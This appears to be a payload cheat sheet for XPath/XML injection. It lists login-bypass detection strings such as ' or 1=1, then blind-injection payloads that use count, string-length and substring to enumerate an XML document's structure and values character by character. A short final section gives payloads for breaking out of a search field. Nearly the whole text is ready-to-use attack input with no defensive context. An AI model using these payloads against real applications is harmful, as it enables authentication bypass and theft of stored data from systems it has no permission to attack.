################################################################################################################

# XMLi Login Form
<!--Detection-->
'
' or 1=1
' or 1=2
' or 1=1 or '
' or 1=2 or '
' or 1=1 or ''='
' or position()=1 or ''='
' or position()=2 or ''='
...

<!--Getting number of the root element -->
'or 1=1 and count(/*)=1 or ''='

<!--Getting number of the elements -->
' or 1=1 and count(//*)=1 or ''='
...
' or 1=1 and count(//*)=43 or ''='

<!--Getting number of the attributes -->
' or 1=1 and count(//@)=1 or ''='
...
' or 1=1 and count(//@)=43 or ''='

<!--Getting number of the child elements of the root | count(child::*)=count(../child::*) -->
' or 1=1 and count(../child::*)=1 or ''='
...
' or 1=1 and count(../child::*)=6 or ''='

<!--getting the length of the name of the current node/root node | name(parent::*)=name(self::*)=name(/node())--> 
' or 1=1 and string-length(name(/node()))=1 or ''=' 
...
' or 1=1 and string-length(name(/node()))=6 or ''='

<!--gettiing name of the root element one by one {/heroes}-->
' or 1=1 and substring(name(parent::*),1,1)='a' or ''='
...
' or 1=1 and substring(name(parent::*),1,1)='h' or ''='	

<!--getting the length of the name of the first child of root element-->
' or 1=1 and string-length(name(../child::*[position()=1]))=1 or ''='	
...
' or 1=1 and string-length(name(../child::*[position()=1]))=4 or ''='

<!--geting the name of the first child of root element one by one {/heroes/hero}-->
' or 1=1 and substring(name(../child::*[position()=1]),1,1)='a' or ''='	
...
' or 1=1 and substring(name(../child::*[position()=1]),1,1)='h' or ''='

<!--getting number of the child of the first child of the root-->
' or 1=1 and count(/heroes/hero[1]/child::*)=1 or ''=' 
...
' or 1=1 and count(/heroes/hero[1]/child::*)=6 or ''='

<!--getting the length of the first child of the first child of the root-->
' or 1=1 and string-length(name(/heroes/hero[1]/child::*[position()=1]))=1 or ''='
...
' or 1=1 and string-length(name(/heroes/hero[1]/child::*[position()=1]))=2 or ''='

<!--getting the name of the first child of the first child of the root {/heroes/hero[1]/id}-->
' or 1=1 and substring(name(/heroes/hero[1]/child::*[position()=1]),1,1)='a' or ''='
...
' or 1=1 and substring(name(/heroes/hero[1]/child::*[position()=1]),1,1)='i' or ''='

<!--getting the length of text of the first child of the first child of the root-->
' or 1=1 and string-length(string(/heroes/hero[1]/id))=1 or ''='
...
' or 1=1 and string-length(string(/heroes/hero[1]/id))=3 or ''='

<!--getting the text of the first child of the first child of the root {/heroes/hero[1]/id/text()}-->
' or 1=1 and substring(/heroes/hero[1]/id,1,1)='1' or ''='
...
' or 1=1 and substring(/heroes/hero[1]/id,1,1)='3' or ''='

################################################################################################################

# XMLi Search
<!--Detection-->
'
') or 1=1][('1
') or 1=1] | //* | a[('1
